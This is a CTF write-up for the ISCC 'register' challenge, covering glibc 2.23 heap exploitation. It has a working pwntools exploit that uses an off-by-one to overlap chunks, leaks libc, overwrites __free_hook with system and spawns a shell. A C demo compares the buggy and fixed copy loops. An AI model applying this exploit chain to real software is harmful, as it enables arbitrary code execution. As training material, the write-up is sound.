ISCC-regis reproduction

register

The GOT is writable (Partial RELRO), so GOT entries could be overwritten; the exploit below targets `__free_hook` instead.

There is an off-by-one vulnerability: the edit routine writes one byte past the requested size, so when a buffer exactly fills its chunk the extra byte lands on the low byte of the next chunk's size field.

Each entry is kept in a struct (the size of the data buffer and a pointer to it), itself a 0x20 heap chunk:

```c
struct {
    int size;        /* length of the data buffer */
    char *heapaddr;  /* pointer to the data chunk */
} user;
```

If heapaddr can be modified, an edit on that entry writes wherever heapaddr points, i.e. an arbitrary address write.

Using the off-by-one, overwrite the low byte of the next chunk's size field (the exploit writes 0xe1, i.e. 0xe0 with PREV_INUSE set) so that the chunk grows to cover the adjacent 0x20 struct chunk. Freeing and reallocating it gives overlapping chunks: editing the enlarged chunk rewrites the contents of the 0x20 struct chunk, including heapaddr, which turns edit on that entry into an arbitrary write. Point heapaddr at `__free_hook`, write `system` over it, and free an entry whose data starts with "/bin/sh". The libc base needed for this comes from the unsorted bin: a freed 0xc0 chunk keeps main_arena+88 in its bk field, which show prints back after the chunk is reallocated (0x3c4b78 from the libc base on the challenge's libc, which matches the Ubuntu 16.04 glibc 2.23 build).
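The two things the chain depends on, shown as an added C example (this is not the challenge binary's code; the exact form of its edit loop is assumed to be a `<=` bound, and the heap is stood in for by a constructed buffer): the request-to-chunk-size arithmetic behind the 0x58*2+8 and 0x68*2+8 requests, and the one-byte overwrite of the neighbouring size field beside a fixed copy loop. It also shows why the request size must exactly fill the chunk: with a smaller request the extra byte lands in padding, not on the size field.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Per-entry record, same layout as the struct recovered from the binary. */
struct user {
    int size;
    char *heapaddr;
};

/* glibc malloc on x86-64: request + 8 header bytes, rounded up to 16, min 0x20. */
size_t chunk_size(size_t request)
{
    size_t sz = (request + 8 + 15) & ~(size_t)15;
    return sz < 0x20 ? 0x20 : sz;
}

/* Offset of the next chunk's size field relative to this chunk's user pointer. */
size_t next_size_offset(size_t request)
{
    return chunk_size(request) - 8;
}

/* Assumed shape of the bug: the copy loop runs up to and including size,
 * so one byte is written past the buffer. */
void edit_vuln(struct user *u, const unsigned char *src, size_t srclen)
{
    for (size_t i = 0; i <= (size_t)u->size && i < srclen; i++)
        u->heapaddr[i] = (char)src[i];
}

/* Hardened copy: strictly less than size. */
void edit_fixed(struct user *u, const unsigned char *src, size_t srclen)
{
    for (size_t i = 0; i < (size_t)u->size && i < srclen; i++)
        u->heapaddr[i] = (char)src[i];
}

/* Constructed stand-in for the heap: a chunk's user area followed by the
 * neighbour's size field. Run the given edit with a request+1 byte payload
 * and return the neighbour's size field afterwards. */
uint64_t simulate_edit(void (*edit)(struct user *, const unsigned char *, size_t),
                       size_t request, uint64_t neighbour_size, unsigned char last_byte)
{
    size_t off = next_size_offset(request);
    unsigned char *region = calloc(off + sizeof neighbour_size, 1);
    memcpy(region + off, &neighbour_size, sizeof neighbour_size);

    struct user u = { .size = (int)request, .heapaddr = (char *)region };
    unsigned char *payload = malloc(request + 1);
    memset(payload, 'A', request);
    payload[request] = last_byte;   /* the off-by-one byte, 0xe1 in the exploit */

    edit(&u, payload, request + 1);

    uint64_t after;
    memcpy(&after, region + off, sizeof after);
    free(payload);
    free(region);
    return after;
}

int main(void)
{
    printf("request 0xb8 -> chunk 0x%zx, next size field at user+0x%zx\n",
           chunk_size(0xb8), next_size_offset(0xb8));
    printf("neighbour size after vulnerable edit: 0x%llx\n",
           (unsigned long long)simulate_edit(edit_vuln, 0xb8, 0x21, 0xe1));
    printf("neighbour size after fixed edit:      0x%llx\n",
           (unsigned long long)simulate_edit(edit_fixed, 0xb8, 0x21, 0xe1));
    printf("request 0x10: extra byte hits padding, size stays 0x%llx\n",
           (unsigned long long)simulate_edit(edit_vuln, 0x10, 0x21, 0xe1));
    return 0;
}
```

With a request of 0xb8 the user area is 0xb8 bytes (chunk 0xc0 minus the 8-byte size header), so byte 0xb8 is the neighbour's size; 0x21 becomes 0xe1, which malloc reads as a 0xe0 chunk, exactly what the later 0x68*2+8 = 0xd8 request asks for.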

The exploit (pwntools; the helper aliases and menu wrappers are filled in so the script runs as one file):

```python
from pwn import *

# The offsets below (main_arena+88 = 0x3c4b78, one_gadget 0xf1247) are for the
# glibc 2.23 build the challenge shipped with.
p = process("./register")
libc = ELF("./libc.so.6")

# short aliases used throughout
li = lambda s: log.info(s)
sla = lambda a, b: p.sendlineafter(a, b)
sa = lambda a, b: p.sendafter(a, b)
ru = lambda s: p.recvuntil(s)
uu64 = lambda: u64(p.recv(6).ljust(8, b"\x00"))   # 6-byte userland pointer
db = lambda: gdb.attach(p)
ia = lambda: p.interactive()
c = lambda: p.close()

# Menu wrappers. Choices 2/3/4 and their prompts are the ones the exploit
# drives; choice 1 and its size prompt are assumed (not shown on the page),
# adjust them to the binary.
def add(size, content):
    sla("Your choice :", "1")
    sla("Size :", str(size))                 # assumed prompt
    sa("enter the username : ", content)     # assumed: same prompt as edit

def edit(idx, content):
    sla("Your choice :", "2")
    sla("Index :", str(idx))
    sa("enter the username : ", content)

def show(idx):
    sla("Your choice :", "3")
    sla("Index :", str(idx))

def delete(idx):
    sla("Your choice :", "4")
    sla("Index :", str(idx))

# --------------------------exploit--------------------------
def exploit():
    li('exploit...')
    # two 0x20 entries, free the first so its chunks sit in the 0x20 fastbin
    for i in range(0, 2):
        add(0x10, b"1")
    delete(0)
    # (author's note) chunks: 2 0 1
    # 0x58*2+8 = 0xb8 -> 0xc0 chunk; freeing and reallocating it leaves
    # main_arena+88 in its bk field, right after the 8 bytes we write
    add(0x58*2+8, b"111111")    # chunk 0
    add(0x58*2+8, b"111111")    # chunk 3
    delete(0)
    add(0x58*2+8, b"1111111")   # chunk 0 again, taken from the unsorted bin
    show(0)
    ru(b"1111111\n")
    libc_addr = uu64() - 0x3C4B78
    li("libc_addr -------> 0x%x" % libc_addr)
    ru(b"Done !")
    one_gadget = libc_addr + 0xf1247    # unused; this path uses system
    free_hook = libc_addr + libc.symbols["__free_hook"]
    system = libc_addr + libc.symbols["system"]

    add(0x58*2+8, b"111111")    # chunk 4
    add(0x58*2+8, b"111111")    # chunk 5
    # off-by-one: 0xb8 bytes fill chunk 0, the extra byte 0xe1 overwrites the
    # low byte of the next chunk's size field, enlarging it to 0xe0
    edit(0, b"/bin/sh\x0a\x00" + b"A"*(0x58*2-9) + p64(0x180) + b"\xe1")
    delete(2)
    read_plt = 0x602020     # unused in this path
    # 0x68*2+8 = 0xd8 -> 0xe0: reallocate the enlarged chunk and forge the
    # overlapped 0x20 struct chunk: header 0x21, size 0x100, heapaddr = __free_hook
    add(0x68*2+8, b"A"*(0x58*2+8) + p64(0x21) + p64(0x100) + p64(free_hook))
    # db()                  # gdb attach, useful while checking the overlap
    edit(3, p64(system))    # arbitrary write: *__free_hook = system
    delete(0)               # free("/bin/sh") -> system("/bin/sh")

def finish():
    ia()
    c()

exploit()
finish()
```